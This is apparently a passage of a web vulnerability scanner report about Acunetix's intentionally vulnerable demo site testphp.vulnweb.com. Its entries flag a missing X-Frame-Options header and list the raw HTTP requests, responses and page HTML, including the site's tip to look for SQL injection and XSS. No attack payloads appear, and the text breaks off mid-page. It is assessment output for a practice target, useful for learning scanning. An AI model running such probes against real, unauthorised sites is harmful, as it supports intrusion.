GET http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/hpp/?pp=12 |
Request Body - size: 0 bytes. |
|
Response Header - size: 219 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:20 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 7 |
Response Body - size: 7 bytes. |
valid12
|
URL | http://testphp.vulnweb.com/images/ |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 265 bytes. |
GET http://testphp.vulnweb.com/images/ HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/images |
Request Body - size: 0 bytes. |
|
Response Header - size: 148 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:52 GMT Content-Type: text/html Connection: keep-alive Content-Length: 377 |
Response Body - size: 377 bytes. |
<html>
<head><title>Index of /images/</title></head> <body> <h1>Index of /images/</h1><hr><pre><a href="../">../</a> <a href="logo.gif">logo.gif</a> 11-May-2011 10:27 6660 <a href="remark.gif">remark.gif</a> 11-May-2011 10:27 79 </pre><hr></body> </html> |
URL | http://testphp.vulnweb.com/index.php |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 260 bytes. |
GET http://testphp.vulnweb.com/index.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:44 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4958 |
Response Body - size: 4,958 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>Home of Acunetix Art</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id="pageName">welcome to our page</h2> <div class="story"> <h3>Test site for Acunetix WVS.</h3> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | <a href="/Mod_Rewrite_Shop/">Shop</a> | <a href="/hpp/">HTTP Parameter Pollution</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/listproducts.php?artist=1 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 297 bytes. |
GET http://testphp.vulnweb.com/listproducts.php?artist=1 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/artists.php?artist=1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:20 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 7994 |
Response Body - size: 7,994 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>pictures</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>r4w8173</h2><div class='story'><a href='product.php?pic=1'><h3>The shore</h3></a><p><a href='showimage.php?file=./pictures/1.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/1.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=1','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=2'><h3>Mistery</h3></a><p><a href='showimage.php?file=./pictures/2.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/2.jpg&size=160' width='160' height='100'></a>Donec molestie. Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=2','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=3'><h3>The universe</h3></a><p><a href='showimage.php?file=./pictures/3.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/3.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet. Donec molestie. Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=3','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=4'><h3>Walking</h3></a><p><a href='showimage.php?file=./pictures/4.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/4.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. </p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=4','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=5'><h3>Mean</h3></a><p><a href='showimage.php?file=./pictures/5.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/5.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=5','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=6'><h3>Thing</h3></a><p><a href='showimage.php?file=./pictures/6.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/6.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. </p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=6','comment','width=500,height=400')">comment on this picture</a></p></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/listproducts.php?artist=2 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 297 bytes. |
GET http://testphp.vulnweb.com/listproducts.php?artist=2 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/artists.php?artist=2 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:20 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5193 |
Response Body - size: 5,193 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>pictures</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Blad3</h2><div class='story'><a href='product.php?pic=7'><h3>Trees</h3></a><p><a href='showimage.php?file=./pictures/7.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/7.jpg&size=160' width='160' height='100'></a>bla bla bla</p><p>painted by: <a href='artists.php?artist=2'>Blad3</a></p><p><a href='#' onClick="window.open('./comment.php?pid=7','comment','width=500,height=400')">comment on this picture</a></p></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/listproducts.php?artist=3 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 297 bytes. |
GET http://testphp.vulnweb.com/listproducts.php?artist=3 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/artists.php?artist=3 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:20 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4699 |
Response Body - size: 4,699 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>pictures</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/listproducts.php?cat=1 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 288 bytes. |
GET http://testphp.vulnweb.com/listproducts.php?cat=1 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/categories.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:53 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 7880 |
Response Body - size: 7,880 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>pictures</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Posters</h2><div class='story'><a href='product.php?pic=1'><h3>The shore</h3></a><p><a href='showimage.php?file=./pictures/1.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/1.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=1','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=2'><h3>Mistery</h3></a><p><a href='showimage.php?file=./pictures/2.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/2.jpg&size=160' width='160' height='100'></a>Donec molestie. Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=2','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=3'><h3>The universe</h3></a><p><a href='showimage.php?file=./pictures/3.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/3.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet. Donec molestie. Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=3','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=4'><h3>Walking</h3></a><p><a href='showimage.php?file=./pictures/4.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/4.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. </p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=4','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=5'><h3>Mean</h3></a><p><a href='showimage.php?file=./pictures/5.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/5.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=5','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=7'><h3>Trees</h3></a><p><a href='showimage.php?file=./pictures/7.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' 